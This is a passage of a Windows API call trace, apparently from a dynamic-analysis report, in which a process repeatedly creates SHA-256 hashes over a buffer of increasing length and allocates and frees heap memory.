[0151.217] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64730 [0151.217] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e64730, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64730, pdwDataLen=0xce51c) returned 1 [0151.217] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.217] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.217] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.217] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.217] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0151.217] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.217] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64a60 [0151.217] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e64a60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64a60, pdwDataLen=0xce51c) returned 1 [0151.217] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.217] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.217] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0151.218] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.218] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0151.218] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.218] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e647c0 [0151.218] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e647c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e647c0, pdwDataLen=0xce51c) returned 1 [0151.218] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.218] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0151.218] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.219] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.219] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0151.219] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.220] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e648e0 [0151.220] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e648e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e648e0, pdwDataLen=0xce51c) returned 1 [0151.220] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.220] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.220] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0151.220] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.221] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0151.221] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.221] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61580 [0151.221] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e61580, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e61580, pdwDataLen=0xce51c) returned 1 [0151.221] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.221] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.221] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.221] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.221] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0151.221] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.221] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61670 [0151.221] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e61670, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e61670, pdwDataLen=0xce51c) returned 1 [0151.221] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.221] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.221] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.229] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.230] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0151.230] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.230] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61070 [0151.230] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e61070, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e61070, pdwDataLen=0xce51c) returned 1 [0151.230] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.230] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.230] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.230] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.230] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0151.230] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.230] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60f50 [0151.230] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e60f50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e60f50, pdwDataLen=0xce51c) returned 1 [0151.231] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.231] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.231] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0151.231] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.231] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0151.231] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.231] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61640 [0151.231] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e61640, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e61640, pdwDataLen=0xce51c) returned 1 [0151.231] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.231] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0151.231] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0151.232] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.232] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0151.232] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.232] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61190 [0151.232] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e61190, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e61190, pdwDataLen=0xce51c) returned 1 [0151.232] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.232] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0151.232] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.233] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.233] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0151.233] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.233] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60f80 [0151.233] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.233] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.233] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0151.233] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.233] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0151.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61100 [0151.234] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.234] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.234] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0151.234] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.234] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0151.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e615e0 [0151.234] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.234] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0151.234] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0151.235] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.235] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0151.235] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61280 [0151.235] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.235] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0151.235] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fa80 | out: hHeap=0x2150000) returned 1 [0151.235] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e5fa80 [0151.235] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.236] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.236] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x20, dwFlags=0x0) returned 1 [0151.236] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e616d0 [0151.236] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.236] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.236] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.236] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.236] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x40, dwFlags=0x0) returned 1 [0151.236] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61010 [0151.236] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.236] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.236] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0151.237] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.237] CryptHashData (hHash=0x332b7900, pbData=0x32e5fa80, dwDataLen=0x60, dwFlags=0x0) returned 1 [0151.237] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60b30 [0151.237] CryptDestroyHash (hHash=0x332b7900) returned 1 [0151.237] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0151.237] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.238] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.238] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x80, dwFlags=0x0) returned 1 [0151.238] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60cb0 [0151.238] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.238] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.238] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.238] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.238] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0151.238] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60ef0 [0151.238] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.238] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.238] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.239] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.239] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0151.239] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e610a0 [0151.239] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.239] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.239] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.240] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.240] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0151.240] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e616a0 [0151.240] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.240] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.240] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.240] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.240] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x100, dwFlags=0x0) returned 1 [0151.240] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60fe0 [0151.240] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.241] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.241] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.241] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.241] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x120, dwFlags=0x0) returned 1 [0151.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60fb0 [0151.241] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.241] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.241] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.242] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.242] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x140, dwFlags=0x0) returned 1 [0151.242] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60b00 [0151.242] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.242] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.242] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0151.242] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.242] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x160, dwFlags=0x0) returned 1 [0151.243] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e612e0 [0151.243] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.243] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0151.243] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.243] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.243] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x180, dwFlags=0x0) returned 1 [0151.243] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e611f0 [0151.243] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.243] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.243] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.244] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.244] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0151.244] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61310 [0151.244] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.244] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.244] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.245] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.245] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0151.245] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60bc0 [0151.245] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.245] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.245] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0151.245] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.245] CryptHashData (hHash=0x332b7970, pbData=0x32e5fa80, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0151.245] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e611c0 [0151.245] CryptDestroyHash (hHash=0x332b7970) returned 1 [0151.245] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0151.245] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0151.246] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.246] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x200, dwFlags=0x0) returned 1 [0151.246] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61160 [0151.246] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.246] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0151.246] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.247] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.247] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x220, dwFlags=0x0) returned 1 [0151.247] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60da0 [0151.247] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.247] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.247] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.247] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.247] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0x240, dwFlags=0x0) returned 1 [0151.247] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61490 [0151.247] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.247] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.247] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.248] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.248] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x260, dwFlags=0x0) returned 1 [0151.248] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60b90 [0151.248] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.248] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.248] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.249] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.249] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x280, dwFlags=0x0) returned 1 [0151.249] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61220 [0151.249] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.249] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.249] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0151.249] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.249] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0151.249] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61040 [0151.250] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.250] CryptReleaseContext 